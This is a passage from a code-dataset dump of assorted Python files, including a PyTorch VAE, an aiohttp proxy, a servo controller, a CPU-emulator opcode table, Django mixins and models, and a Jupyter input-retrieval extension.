nn.Linear(z_dim,hidden_dim)\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.fc21.bias.data.fill_(0)\n self.fc21.weight.data.uniform_(-initrange, initrange)\n self.fc5.bias.data.fill_(0)\n self.fc5.weight.data.uniform_(-initrange, initrange)\n def noise(self):\n xi = Variable(torch.randn(self.bsz,self.z_dim).cuda(self.device_id))\n return xi\n\n def forward(self, x):\n c0 = Variable(torch.zeros((1,self.bsz,self.hidden_dim)).cuda(self.device_id))\n xi = self.noise()\n h0 = self.fc5(xi)\n h0 = h0.unsqueeze(0)\n s0 = (h0,c0)\n lstm_out, _ = self.lstm(x,s0)\n lstm_out = lstm_out[-1,:,:]\n lstm_out = self.drop(lstm_out)\n z = self.fc21(lstm_out)\n return z\n\nclass Decode(nn.Module):\n\n def __init__(self, x_dim,z_dim,hidden_dim,vocab_size,dropout,bsz,device_id):\n super(Decode, self).__init__()\n self.z_dim = z_dim\n self.hidden_dim = hidden_dim\n self.fc5 = nn.Linear(z_dim,hidden_dim)\n self.lstm = nn.LSTM(x_dim, hidden_dim,dropout=dropout)\n self.fc4 = nn.Linear(hidden_dim,vocab_size)\n self.drop = nn.Dropout(dropout)\n self.bsz = bsz\n self.device_id = device_id\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.fc5.bias.data.fill_(0)\n self.fc5.weight.data.uniform_(-initrange, initrange)\n self.fc4.bias.data.fill_(0)\n self.fc4.weight.data.uniform_(-initrange, initrange)\n\n def forward(self,x_emb, z):\n c0 = Variable(torch.zeros((1,self.bsz,self.hidden_dim)).cuda(self.device_id))\n h0 = self.fc5(z)\n h0 = h0.unsqueeze(0)\n s0 = (h0,c0)\n ht,st = self.lstm(x_emb,s0)\n ht = self.drop(ht)\n recon_batch = self.fc4(ht)\n return recon_batch\nclass Label(nn.Module):\n\n def __init__(self,x_dim,z_dim,hidden_dim,vocab_size,dropout,bsz,device_id):\n super(Label, self).__init__()\n self.x_dim = x_dim\n self.hidden_dim = hidden_dim\n self.fc5 = nn.Linear(z_dim,hidden_dim)\n self.lstm = nn.LSTM(x_dim, hidden_dim,dropout=dropout)\n self.fc1 = nn.Linear(hidden_dim, 2)\n self.drop = nn.Dropout(dropout)\n self.device_id = device_id\n self.bsz = bsz\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.fc5.bias.data.fill_(0)\n self.fc5.weight.data.uniform_(-initrange, initrange)\n self.fc1.bias.data.fill_(0)\n self.fc1.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, x,z):\n c0 = Variable(torch.zeros((1,self.bsz,self.hidden_dim)).cuda(self.device_id))\n h0 = self.fc5(z)\n h0 = h0.unsqueeze(0)\n s0 = (h0,c0)\n lstm_out, _ = self.lstm(x,s0)\n lstm_out = lstm_out[-1,:,:]\n lstm_out = self.drop(lstm_out)\n recon_label = self.fc1(lstm_out)\n probs = F.softmax(recon_label,dim = 1)\n\n return probs\nclass VAE(nn.Module):\n \"\"\"Container module with an encoder, a recurrent module, and a decoder.\"\"\"\n\n def __init__(self, rnn_type, ntoken, ninp, nhid, z_dim,nlayers, device_id, bsz,dropout=0.5, tie_weights=False):\n super(VAE, self).__init__()\n self.drop = nn.Dropout(dropout)\n self.word_embeddings = nn.Embedding(ntoken, ninp)\n self.encoder = Encode(ninp,z_dim,nhid,ntoken,dropout,bsz,device_id)\n self.decoder = Decode(ninp,z_dim,nhid,ntoken,dropout,bsz,device_id)\n self.label = Label(ninp,z_dim,nhid,ntoken,dropout,bsz,device_id)\n self.rnn_type = rnn_type\n self.nhid = nhid\n self.nlayers = nlayers\n self.device_id = device_id\n self.bsz = bsz\n self.embed = nn.Sequential(\n self.word_embeddings,\n self.drop)\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.word_embeddings.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, input):\n emb = self.embed(input)\n z = self.encoder(emb)\n fake_label = self.label(emb,z)\n recon_batch = self.decoder(emb,z)\n return recon_batch,z,fake_label\n\n def noise_loss(self,lr,alpha):\n noise_loss = 0.0\n noise_std = np.sqrt(2/lr*alpha)\n for var in self.parameters():\n means = torch.zeros(var.size()).cuda(self.device_id)\n noise = Variable(torch.normal(means, std = noise_std).cuda(self.device_id),requires_grad = False)\n noise_loss += torch.sum(var * noise)\n return noise_loss\n ","sub_path":"semi_text/model_bae.py","file_name":"model_bae.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"224742981","text":"import asyncio\nfrom aiohttp import web\nfrom .config import repos\n\n\n@asyncio.coroutine\ndef handle(request):\n path = request.match_info['path']\n repo = path.lstrip('/').partition('/')[0]\n if repo not in repos.keys():\n raise web.HTTPNotFound\n return web.Response()\n\napp = web.Application()\napp.router.add_route('GET', '/{path:.*}', handle)\n\nif __name__ == '__main__':\n web.run_app(app)\n\n# vim: set expandtab ts=4 sw=4:\n","sub_path":"repo-proxy/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"436931409","text":"import time\nimport pigpio\n# By default it uses GPIO.BCM pin numbering.\n\n# FIRST RUN sudo pigpiod in terminal\n\nclass PWM:\n\tdef __init__(self, pin, min_val=750, max_val=2300): # vals in us\n\t\tself.pin = pin\n\t\tself.pi = pigpio.pi()\n\t\tself.pi.set_mode(self.pin, pigpio.OUTPUT)\n\t\tself.min= min_val\n\t\tself.max = max_val\n\n\tdef set_angle(self, angle):\n\t\tdeg = float(self.max-self.min)/180\n\t\tduty_cycle = self.min + deg*angle\n\t\tself.pi.set_servo_pulsewidth(self.pin, duty_cycle)\n\n\tdef set_duty_cycle(self, dc): # duty cycle in us\n\t\tself.pi.set_servo_pulsewidth(self.pin, dc)\n\n\tdef stop(self):\n\t\tself.pi.set_servo_pulsewidth(self.pin, 0)\n\t\tself.pi.stop()\n\n\tdef example_servo(self):\n\t\tself.pi.set_servo_pulsewidth(self.pin, self.min) # safe anti-clockwise\n\t\ttime.sleep(5)\n\t\t# self.pi.set_servo_pulsewidth(self.pin, (self.max+self.min)/2) # centre\n\t\t# time.sleep(2)\n\t\tself.pi.set_servo_pulsewidth(self.pin, self.max) # safe clockwise\n\t\ttime.sleep(2)\n\t\tself.stop()\n\n\tdef example_throttle(self):\n\t\tself.pi.set_servo_pulsewidth(self.pin, 1200)\n\t\ttime.sleep(2)\n\t\tself.pi.set_servo_pulsewidth(self.pin, 0)\n\t\t# self.stop()\n\nif __name__ == '__main__':\n\tpin = 17\n\tservo = PWM(pin)\n\t# servo.set_duty_cycle(1000)\n\t# servo.example_throttle()\n\t# servo.example_servo()\n\n\tservo.set_angle(180)\n\ttime.sleep(2)\n\tservo.stop()","sub_path":"src/propelled_cow/src/propelled_cow/pwm_pigpio.py","file_name":"pwm_pigpio.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"571950511","text":"class Solution:\n def rotate(self, matrix):\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n if not matrix or len(matrix) == 1:\n return\n\n initial_len = len(matrix)\n added = 0\n for col in range(len(matrix)):\n print(\"matrix so far\", matrix)\n rotated = [matrix[idx][col] for idx in range(len(matrix) - 1, added-1, -1)]\n matrix.insert(col, rotated)\n added += 1\n print(\"matrix\", matrix)\n\n while initial_len:\n matrix.pop()\n initial_len -= 1\n\n\n return matrix\n\n\ntest_case = [[1,2,3],[4,5,6],[7,8,9]]\nexp_result = [[7,4,1],[8,5,2],[9,6,3]]\nres = Solution().rotate(test_case)\n\n","sub_path":"tinker/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"361974152","text":"from sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nimport matplotlib.pyplot as plt\n\nbreast_cancer_data = load_breast_cancer()\n\n#splitting breast_cancer_data in training and validation sets\ntraining_data, validation_data, training_labels, validation_labels = train_test_split(breast_cancer_data.data, breast_cancer_data.target, test_size = 0.2, random_state = 100)\n\nk_list = range(1,101)\nk_accuracies = []\nfor k in range(1,101):\n classifier = KNeighborsClassifier(k)\n classifier.fit(training_data, training_labels) #fitting data to classifier to generate trends\n score = classifier.score(validation_data, validation_labels) #generating validation score for each K-value\n k_accuracies.append(score)\n \n#plotting K-Neighbors and correlating validation score\nplt.plot(k_list, k_accuracies)\nplt.xlabel(\"k values\")\nplt.ylabel(\"k accuracies\")\nplt.show()\n","sub_path":"BreastCancerClassifer.py","file_name":"BreastCancerClassifer.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"471489626","text":"#########\n# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nfrom flask import request\nfrom flask_restful_swagger import swagger\n\nfrom manager_rest.deployment_update.constants import PHASES\nfrom manager_rest import manager_exceptions\nfrom manager_rest.storage import models\nfrom manager_rest.security import SecuredResource\nfrom manager_rest.security.authorization import authorize\nfrom manager_rest.utils import create_filter_params_list_description\nfrom manager_rest.upload_manager import \\\n UploadedBlueprintsDeploymentUpdateManager\nfrom manager_rest.deployment_update.manager import \\\n get_deployment_updates_manager\n\nfrom .. import rest_decorators\nfrom ..rest_utils import verify_and_convert_bool\n\n\nclass DeploymentUpdate(SecuredResource):\n @rest_decorators.exceptions_handled\n @authorize('deployment_update_create')\n @rest_decorators.marshal_with(models.DeploymentUpdate)\n def post(self, id, phase):\n \"\"\"\n Provides support for two phases of deployment update. The phase is\n chosen according to the phase arg, and the id is used by this step.\n\n In the first phase the deployment update is\n 1. Staged (from a new blueprint)\n 2. The steps are extracted and saved onto the data model.\n 3. The data storage is manipulated according to the\n addition/modification steps.\n 4. The update workflow is run, executing any lifecycles of add/removed\n nodes or relationships.\n\n The second step finalizes the commit by manipulating the data model\n according to any removal steps.\n\n In order\n :param id: for the initiate step it's the deployment_id, and for the\n finalize step it's the update_id\n :param phase: initiate or finalize\n :return: update response\n \"\"\"\n if phase == PHASES.INITIAL:\n return self._commit(id)\n elif phase == PHASES.FINAL:\n return get_deployment_updates_manager().finalize_commit(id)\n\n @staticmethod\n def _commit(deployment_id):\n manager = get_deployment_updates_manager()\n request_json = request.args\n skip_install = verify_and_convert_bool(\n 'skip_install',\n request_json.get('skip_install', 'false'))\n skip_uninstall = verify_and_convert_bool(\n 'skip_uninstall',\n request_json.get('skip_uninstall', 'false'))\n force = verify_and_convert_bool(\n 'force',\n request_json.get('force', 'false'))\n workflow_id = request_json.get('workflow_id', None)\n\n if (skip_install or skip_uninstall) and workflow_id:\n raise manager_exceptions.BadParametersError(\n 'skip_install has been set to {0}, skip uninstall has been'\n ' set to {1}, and a custom workflow {2} has been set to '\n 'replace \"update\". However, skip_install and '\n 'skip_uninstall are mutually exclusive with a custom '\n 'workflow'.format(skip_install,\n skip_uninstall,\n workflow_id))\n\n manager.validate_no_active_updates_per_deployment(\n deployment_id=deployment_id, force=force)\n\n deployment_update, _ = \\\n UploadedBlueprintsDeploymentUpdateManager(). \\\n receive_uploaded_data(deployment_id)\n\n manager.extract_steps_from_deployment_update(deployment_update)\n\n return manager.commit_deployment_update(\n deployment_update,\n skip_install=skip_install,\n skip_uninstall=skip_uninstall,\n workflow_id=workflow_id)\n\n\nclass DeploymentUpdateId(SecuredResource):\n @swagger.operation(\n responseClass=models.DeploymentUpdate,\n nickname=\"DeploymentUpdate\",\n notes='Return a single deployment update',\n parameters=create_filter_params_list_description(\n models.DeploymentUpdate.response_fields, 'deployment update'\n )\n )\n @rest_decorators.exceptions_handled\n @authorize('deployment_update_get')\n @rest_decorators.marshal_with(models.DeploymentUpdate)\n def get(self, update_id):\n return \\\n get_deployment_updates_manager().get_deployment_update(update_id)\n\n\nclass DeploymentUpdates(SecuredResource):\n @swagger.operation(\n responseClass='List[{0}]'.format(\n models.DeploymentUpdate.__name__),\n nickname=\"listDeploymentUpdates\",\n notes='Returns a list of deployment updates',\n parameters=create_filter_params_list_description(\n models.DeploymentUpdate.response_fields,\n 'deployment updates'\n )\n )\n @rest_decorators.exceptions_handled\n @authorize('deployment_update_list')\n @rest_decorators.marshal_with(models.DeploymentUpdate)\n @rest_decorators.create_filters(models.DeploymentUpdate)\n @rest_decorators.paginate\n @rest_decorators.sortable(models.DeploymentUpdate)\n def get(self, _include=None, filters=None, pagination=None,\n sort=None, **kwargs):\n \"\"\"\n List deployment modification stages\n \"\"\"\n deployment_updates = \\\n get_deployment_updates_manager().list_deployment_updates(\n include=_include, filters=filters, pagination=pagination,\n sort=sort, **kwargs)\n return deployment_updates\n","sub_path":"rest-service/manager_rest/rest/resources_v2_1/deployment_update.py","file_name":"deployment_update.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"542845684","text":"CALL = 0b01010000\nHLT = 0b00000001 \nINT = 0b01010010\nIRET = 0b00010011\nJEQ = 0b01010101\nJGE = 0b01011010\nJGT = 0b01010111\nJLE = 0b01011001\nJLT = 0b01011000\nJMP = 0b01010100\nJNE = 0b01010110\nLD = 0b10000011\nLDI = 0b10000010\nPOP = 0b01000110\nNOP = 0b00000000\nPRA = 0b01001000\nPRN = 0b01000111\nPUSH = 0b01000101\nRET = 0b00010001\nST = 0b10000100\n\n\ndef handle_CALL(self, operand_a, operand_b):\n # Get the current address\n addr = self.reg[operand_a]\n # Advance the return address\n rtn_addr = self.pc + 2\n # Subtract one ('after' the instruction) from SP\n self.reg[7] -= 1 \n sp = self.reg[7]\n # Push the address of the instruction after CALL to the stack\n self.ram[sp] = rtn_addr \n # Set the PC to the address in the given register\n self.pc = addr\n\ndef handle_HLT(self, *args):\n # Stop all processes\n self.is_running = False\n\ndef handle_LDI(self, operand_a, operand_b):\n # Set the value of the register at op_a to op_b\n self.reg[operand_a] = operand_b\n\ndef handle_PRN(self, operand_a, operand_b):\n # print the value of the register at op_a\n print(self.reg[operand_a])\n\ndef handle_PUSH(self, operand, *args):\n val = self.reg[operand]\n # decrement the SP\n self.reg[7] -= 1\n # Put the value into the stack at the address indicated by the SP\n self.ram[self.reg[7]] = val\n\ndef handle_POP(self, operand, *args):\n # Put the value at the top of the stack into the given register\n val = self.ram[self.reg[7]]\n self.reg[operand] = val\n # Increment the stack point\n self.reg[7] += 1\n\ndef handle_RET(self, *args):\n # Subroutine complete, return\n rtn_addr = self.ram[self.reg[7]]\n # Increment by one because the value has been handled\n self.reg[7] += 1\n # value from the top of the stack gets stored to PC\n self.pc = rtn_addr\n\ndef handle_INT(self, operand, *args):\n # set r6's nth bit to the value in the given reg\n # use hashing w/ or to preserve all other digits\n # hashing number will be a 1 squished over by the amount of the value\n self.reg[6] |= (1 << self.reg[operand])\n\ndef handle_IRET(self, *args):\n # pop r6-r0 off the stack in that order\n for i in range(6, -1, -1):\n self.handle_POP(i)\n # pop the FL reg off the stack\n self.FL = self.ram_read(self.reg[7])\n self.reg[7] += 1\n # pop the return address off and store it in pc\n self.pc = self.reg[7]\n #TODO re-enable interupts (?)\n\ndef handle_JEQ(self, operand, *args):\n # Check if the flag has a 1 in the E (last position)\n # Hash with & b/c we only care about the last digit\n # If the last digit is true, this will return true\n if self.FL & 0b00000001:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JGE(self, operand, *args):\n # If the last or second last position is true, this will return true\n if self.FL & 0b00000011:\n self.pc = self.reg[operand]\n # PC incrementer in run is set to ignore these calls in case they are true\n # if they're false, the PC needs to be incremented.\n else:\n self.pc += 2\n\ndef handle_JGT(self, operand, *args):\n # if the second last position is true, this will return true\n if self.FL & 0b00000010:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JLE(self, operand, *args):\n if self.FL & 0b00000110:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JLT(self, operand, *args):\n if self.FL & 0b00001000:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JMP(self, operand, *args):\n # Move the pc forward, regardless\n # This call is ignored by the run method.\n self.pc = self.reg[operand]\n\ndef handle_JNE(self, operand, *args):\n # Only jump if E = 0\n if not self.FL & 0b00000001:\n self.pc = self.reg[operand]\n else: \n self.pc += 2\n\ndef handle_LD(self, operand_a, operand_b):\n self.reg[operand_a] = self.ram[self.reg[operand_b]]\n\ndef handle_NOP(self, *args):\n pass\n\ndef handle_PRA(self, operand, *args):\n # get the value at the indicated reg\n letter = self.reg[operand]\n # convert it to a letter and print\n print(chr(letter))\n\ndef handle_ST(self, operand_a, operand_b):\n # write to memory; reg_b goes to address in reg_a\n # self.ram_write(address, value)\n self.ram_write(self.reg[operand_a], self.reg[operand_b])\n\nmain_branch = {\n HLT : handle_HLT,\n LDI : handle_LDI,\n PRN : handle_PRN,\n PUSH : handle_PUSH,\n POP : handle_POP,\n CALL : handle_CALL,\n RET : handle_RET,\n INT : handle_INT,\n IRET : handle_IRET,\n JEQ: handle_JEQ,\n JGE: handle_JGE,\n JGT: handle_JGT,\n JLE: handle_JLE,\n JLT: handle_JLT,\n JMP: handle_JMP,\n JNE: handle_JNE,\n LD: handle_LD,\n NOP: handle_NOP,\n PRA: handle_PRA,\n ST: handle_ST,\n}","sub_path":"ls8/main_ops.py","file_name":"main_ops.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"204504128","text":"#!/usr/bin/python\n\"\"\"postprocess\"\"\"\n\nimport argparse\nimport ruamel.yaml\n\n\ndef read(filename):\n \"\"\"return file contents\"\"\"\n\n with open(filename, 'r') as file_in:\n return file_in.read()\n\n\ndef write(filename, cwl):\n \"\"\"write to file\"\"\"\n\n with open(filename, 'w') as file_out:\n file_out.write(cwl)\n\n\ndef main():\n \"\"\"main function\"\"\"\n\n parser = argparse.ArgumentParser(description='postprocess')\n\n parser.add_argument(\n '-f',\n action=\"store\",\n dest=\"filename_cwl\",\n help='Name of the cwl file',\n required=True\n )\n\n params = parser.parse_args()\n\n cwl = ruamel.yaml.load(read(params.filename_cwl),\n ruamel.yaml.RoundTripLoader)\n\n# 1) we're doing this way to preserve the order\n# can't figure out other ways.\n# 2) the prefix --in param must be set up this way to have\n# ABRA output --in multiple times\n input_file_type = \"\"\"\ntype: array\nitems: File\n\"\"\"\n cwl['inputs']['in']['type'] = ruamel.yaml.load(input_file_type, ruamel.yaml.RoundTripLoader)\n cwl['inputs']['in']['inputBinding'].insert(0, 'itemSeparator', ',')\n cwl['inputs']['in']['secondaryFiles'] = ['^.bai']\n cwl['inputs']['targets']['type'].insert(1, 'File')\n input_out_type = \"\"\"\ntype: array\nitems: string\n\"\"\"\n cwl['inputs']['out']['type'] = ruamel.yaml.load(input_out_type, ruamel.yaml.RoundTripLoader)\n cwl['inputs']['out']['inputBinding'].insert(0, 'itemSeparator', ',')\n cwl['inputs']['threads']['default'] = '15'\n del cwl['inputs']['version']\n del cwl['inputs']['java_version']\n\n write(params.filename_cwl, ruamel.yaml.dump(\n cwl, Dumper=ruamel.yaml.RoundTripDumper))\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"build/cwl-wrappers/cmo-abra/0.92/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"6013825","text":"from django.core.urlresolvers import reverse_lazy\n\nfrom .models import Aluno, Professor, Horario, Turma, \\\n DiasInuteis, Item\nfrom .forms import AlunoForm, ProfessorForm, HorarioForm, \\\n TurmaForm, DiasInuteisForm, ItemForm\n\n\nBASE_FORM_ALUNO = 'form/aluno_form.html'\nBASE_FORM_PROFESSOR = 'form/professor_form.html'\nBASE_FORM_TURMA = 'form/turma_form.html'\nBASE_FORM_HORARIO = 'form/horario_form.html'\nBASE_FORM_DIAS_INUTEIS = 'form/dias_inuteis_form.html'\nBASE_FORM_ITEM = 'form/item_form.html'\n\n\nclass AlunoViewMixin(object):\n\n model = Aluno\n form_class = AlunoForm\n success_url = reverse_lazy('register:aluno:list')\n\n def get_context_data(self, **kwargs):\n context = super(AlunoViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_ALUNO\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Aluno\"\n\n return context\n\n\nclass ProfessorViewMixin(object):\n\n model = Professor\n form_class = ProfessorForm\n success_url = reverse_lazy('register:professor:list')\n\n def get_context_data(self, **kwargs):\n context = super(ProfessorViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_PROFESSOR\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Professor\"\n\n return context\n\n\nclass HorarioViewMixin(object):\n\n model = Horario\n form_class = HorarioForm\n success_url = reverse_lazy('register:horario:list')\n\n def get_context_data(self, **kwargs):\n context = super(HorarioViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_HORARIO\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Horario\"\n\n return context\n\n\nclass TurmaViewMixin(object):\n\n model = Turma\n form_class = TurmaForm\n success_url = reverse_lazy('register:turma:list')\n\n def get_context_data(self, **kwargs):\n context = super(TurmaViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_TURMA\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Turma\"\n context['itens'] = Item.objects.all()\n\n return context\n\n\nclass DiasInuteisViewMixin(object):\n\n model = DiasInuteis\n form_class = DiasInuteisForm\n success_url = reverse_lazy('register:dias_inuteis:list')\n\n def get_context_data(self, **kwargs):\n context = super(DiasInuteisViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_DIAS_INUTEIS\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Dias Inuteis\"\n\n return context\n\n\nclass ItemViewMixin(object):\n\n model = Item\n form_class = ItemForm\n success_url = reverse_lazy('register:item:list')\n\n def get_context_data(self, **kwargs):\n context = super(ItemViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_ITEM\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Item\"\n\n return context","sub_path":"onda_esportiva/register/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"443114030","text":"import json\nimport shutil\nfrom pathlib import Path\n\nfrom notebook.base.handlers import IPythonHandler\nfrom notebook.utils import url_path_join\nfrom simcore_sdk import node_ports\n\n\nasync def retrieve_data():\n print(\"retrieving data...\")\n PORTS = node_ports.ports()\n\n inputs_path = Path(\"~/home\").expanduser()\n inputs_path.mkdir(exist_ok=True)\n\n values = {}\n for node_input in PORTS.inputs: \n if not node_input or node_input.value is None:\n continue\n print(\"getting data from port '{}' with value '{}'...\".format(node_input.key, node_input.value))\n value = await node_input.get()\n values[node_input.key] = {\"type\": node_input.type, \"value\": value}\n\n if \"data:\" in node_input.type:\n dest = inputs_path / node_input.key\n dest.mkdir(exist_ok=True, parents=True)\n dest = dest / Path(value).name\n shutil.move(value, dest)\n values[node_input.key] = {\"type\": node_input.type, \"value\": str(dest)}\n\n values_file = inputs_path / \"values.json\"\n with values_file.open('w') as fp:\n json.dump(values, fp)\n\nclass HelloWorldHandler(IPythonHandler):\n async def get(self):\n await retrieve_data()\n self.finish('Hello, world!')\n\ndef load_jupyter_server_extension(nb_server_app):\n \"\"\"\n Called when the extension is loaded.\n Args:\n nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance.\n \"\"\"\n web_app = nb_server_app.web_app\n host_pattern = '.*$'\n route_pattern = url_path_join(web_app.settings['base_url'], '/retrieve')\n \n web_app.add_handlers(host_pattern, [(route_pattern, HelloWorldHandler)])\n ","sub_path":"Dockerfile_notebook_only/input_retriever.py","file_name":"input_retriever.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"38664875","text":"\ndef reverse(word):\n new_string = []\n index = len(word)\n # word_arr = list(word)\n\n while index:\n index -= 1\n new_string.append(word[index])\n return new_string\n\nword = input('input a string :')\nprint(reverse(word))\n","sub_path":"mix_function/reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"371336618","text":"import numpy as np\nfrom convolution_step import conv_single_step\n\n\nnp.random.seed(1)\na_slice_prev = np.random.randn(4, 4, 3)\nW = np.random.randn(4, 4, 3)\nb = np.random.randn(1, 1, 1)\n\nZ = conv_single_step(a_slice_prev, W, b)\nprint(\"Z =\", Z)\n\nassert (type(Z) == np.float64 or type(Z) == np.float32), \"You must cast the output to float\"\nassert np.isclose(Z, -6.999089450680221), \"Wrong value\"\n","sub_path":"machine-learning/coursera/deep-learning-specialization/course4/week1/assigment/cnn_from_scratch/convolution_step_test.py","file_name":"convolution_step_test.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"312820504","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\nimport branch_io\n\nwith open(\"requirements.txt\") as infile:\n requires = list(map(lambda x: x.strip(), infile.readlines()))\n\nsetup_options = dict(\n name='branch-client',\n version=branch_io.__version__,\n description='Python client for branch.io.',\n long_description='Python client for branch.io.',\n author='Upside Services, Inc',\n url='https://github.com/upside-services/branch-io-clients',\n scripts=[],\n packages=find_packages(exclude=['tests*']),\n install_requires=requires\n)\n\nsetup(**setup_options)","sub_path":"python-client/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"85511096","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom datetime import date\nfrom smart_selects.db_fields import ChainedForeignKey\nfrom localflavor.ar import ar_provinces\n\n\nPHONE_TYPE = (\n ('C', 'Celular'),\n ('F', 'Fijo'),\n ('W', 'Trabajo'),\n )\n\n\nclass Client(models.Model):\n firstname = models.CharField(max_length=200, verbose_name='nombre')\n lastname = models.CharField(max_length=200, null=True, blank=True, verbose_name='apellido')\n email = models.EmailField(max_length=200, null=True, blank=True, verbose_name='email')\n\n def __unicode__(self):\n return \"%s %s\" % (self.firstname, self.lastname)\n\n class Meta:\n verbose_name = 'cliente'\n\n\nclass Address(models.Model):\n address = models.CharField(max_length=200, verbose_name='calle y número')\n city = models.CharField(max_length=200, verbose_name='ciudad')\n state = models.CharField(max_length=1, choices=ar_provinces.PROVINCE_CHOICES, verbose_name='provincia')\n client = models.ForeignKey(Client)\n\n def __unicode__(self):\n return \"%s, %s, %s\" % (self.address, self.city, self.state)\n\n class Meta:\n verbose_name = 'dirección'\n verbose_name_plural = 'direcciones'\n\n\nclass PhoneNumber(models.Model):\n number = models.CharField(max_length=200, verbose_name='número')\n number_type = models.CharField(max_length=1, choices=PHONE_TYPE, verbose_name='tipo')\n client = models.ForeignKey(Client)\n\n class Meta:\n verbose_name = 'número de teléfono'\n verbose_name_plural = 'números de teléfono'\n\n\nclass Specie(models.Model):\n name = models.CharField(max_length=200, verbose_name='nombre')\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n verbose_name = 'especie'\n\n\nclass Breed(models.Model):\n name = models.CharField(max_length=200, verbose_name='nombre')\n specie = models.ForeignKey(Specie)\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n verbose_name = 'raza'\n\n\nclass Gender(models.Model):\n name = models.CharField(max_length=200, verbose_name='nombre')\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n verbose_name = 'sexo'\n\n\nclass Patient(models.Model):\n name = models.CharField(max_length=200, verbose_name='nombre')\n owner = models.ForeignKey(Client, verbose_name='dueño')\n specie = models.ForeignKey(Specie, null=True, verbose_name='especie')\n breed = ChainedForeignKey(Breed, null=True, chained_field=\"specie\", chained_model_field=\"specie\", \n show_all=False, auto_choose=True, verbose_name='raza')\n gender = models.ForeignKey(Gender, null=True, verbose_name='sexo')\n birthday = models.DateField(null=True, verbose_name='fecha de nacimiento')\n identifier = models.CharField(null=True, blank=True, max_length=200, verbose_name='identificador')\n initial_anamnesis = models.TextField(null=True, blank=True, verbose_name='anamnesis')\n\n def age(self):\n today = date.today()\n return today.year - self.birthday.year - ((today.month, today.day) < (self.birthday.month, born.day))\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n verbose_name = 'paciente'\n\n\nclass MedicalRecord(models.Model):\n date = models.DateField(default=date.today, verbose_name='fecha')\n patient = models.ForeignKey(Patient)\n anamnesis = models.TextField(null=True, blank=True, verbose_name='anamnesis')\n exam = models.TextField(null=True, blank=True, verbose_name='examen')\n 